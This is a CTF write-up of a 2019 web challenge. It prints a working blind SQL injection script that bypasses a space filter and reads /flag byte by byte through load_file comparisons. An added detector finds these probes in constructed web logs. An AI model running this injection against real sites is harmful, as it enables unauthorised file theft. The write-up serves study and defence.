CISCN 2019 East-South China Regional Offline Final, WEB Challenge 1

The challenge filtered `union` and a large number of SQL functions; the intended solution was to read a file. I was too hasty at the time and didn't solve it, so I'm going over it again now. The script is very simple: it relies on ASCII string comparison (the comparison is done byte by byte, and a shorter string sorts before a longer one with the same prefix), for example
select load_file('/flag')>='A'
select load_file('/flag')>='AB'
select load_file('/flag')>='ABC'
select load_file('/flag')>='ABCD'
Building on this logic, a binary-search approach can be written straightforwardly: each query asks whether the file contents are >= the known prefix plus a guessed byte, and the answer narrows the search range for the next byte.
Let's look at the code.

import requests

url = 'http://localhost/index.php'

def func(x):
    # Spaces are filtered, so inline comments are used as whitespace
    return x.replace(' ', '/**/')

def check(mystr):
    # Inject a comparison of the file contents against the guessed prefix;
    # 'binary' forces a byte-wise (case-sensitive) comparison
    username = """hack' or binary (select load_file('/flag'))>='{0}'#"""
    username = func(username)
    username = username.format(mystr)
    password = 'hack'
    # latin-1 keeps one byte per character for values 128-255, matching the Python 2 original
    r = requests.post(url=url, data={'username': username.encode('latin-1'), 'password': password})
    return 'success' in r.text

flag = ''
for i in range(1, 20):
    # Binary search for the largest byte c such that file >= flag + c; that c is the next byte
    left = 0
    right = 255
    while left < right:
        mid = (left + right + 1) >> 1
        if check(flag + chr(mid)):
            left = mid
        else:
            right = mid - 1
    if left == 0:
        # No byte satisfies the comparison: the file has been read to the end
        break
    flag += chr(left)
    print(flag)
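
From the defender's side, as an added illustration that is not part of the original writeup: the script above leaves a recognisable trace in web logs, namely repeated POSTs from one client whose injected field combines a file read with a comparison against a growing string literal, with /**/ standing in for spaces. The detection routine below undoes the comment-as-whitespace trick and groups such probes by client; the log line format and the sample lines are constructed for this example.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlencode

# Primitives the extraction script relies on, matched after /**/ whitespace is undone:
# a file read, and a comparison of a subquery result against a string literal.
COMMENT_WS = re.compile(r"/\*.*?\*/", re.S)
FILE_READ = re.compile(r"\bload_file\s*\(", re.I)
CMP_LITERAL = re.compile(r"\)\s*(?:>=|<=|<>|>|<|=)\s*'([^']*)'")

def normalise(sql_fragment):
    """Collapse inline comments used as whitespace so the real tokens are visible."""
    return re.sub(r"\s+", " ", COMMENT_WS.sub(" ", sql_fragment))

def analyse(log_lines, min_probes=3):
    """Return {client_ip: [(guessed_literal, used_comment_whitespace), ...]} for clients
    that sent at least min_probes requests combining a file read with a literal comparison,
    which is the character-by-character extraction pattern."""
    per_client = defaultdict(list)
    for line in log_lines:
        ip, _path, body = line.split(" ", 2)
        for value in parse_qs(body).get("username", []):
            uses_comment_ws = COMMENT_WS.search(value) is not None
            text = normalise(value)
            m = CMP_LITERAL.search(text)
            if FILE_READ.search(text) and m:
                per_client[ip].append((m.group(1), uses_comment_ws))
    return {ip: probes for ip, probes in per_client.items() if len(probes) >= min_probes}

def _post_line(ip, username):
    # Constructed log format (not from the original post): "<ip> <path> <urlencoded form body>"
    return f"{ip} /index.php " + urlencode({"username": username, "password": "hack"})

# Constructed sample: one legitimate login, then the writeup's probe sequence with
# /**/ substituted for spaces and a growing guessed prefix.
SAMPLE_LOG = [_post_line("10.0.0.5", "alice")] + [
    _post_line("10.0.0.9", f"hack'/**/or/**/binary/**/(select/**/load_file('/flag'))>='{guess}'#")
    for guess in ("@", "`", "f", "fl", "fla")
]

if __name__ == "__main__":
    for ip, probes in analyse(SAMPLE_LOG).items():
        print(ip, len(probes), "probes, guessed prefixes:", [p for p, _ in probes])
```

A threshold on probe count per client is deliberate: a single such request is an injection attempt worth alerting on anyway, but the burst with a growing literal is what distinguishes file extraction from a one-off scanner hit.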
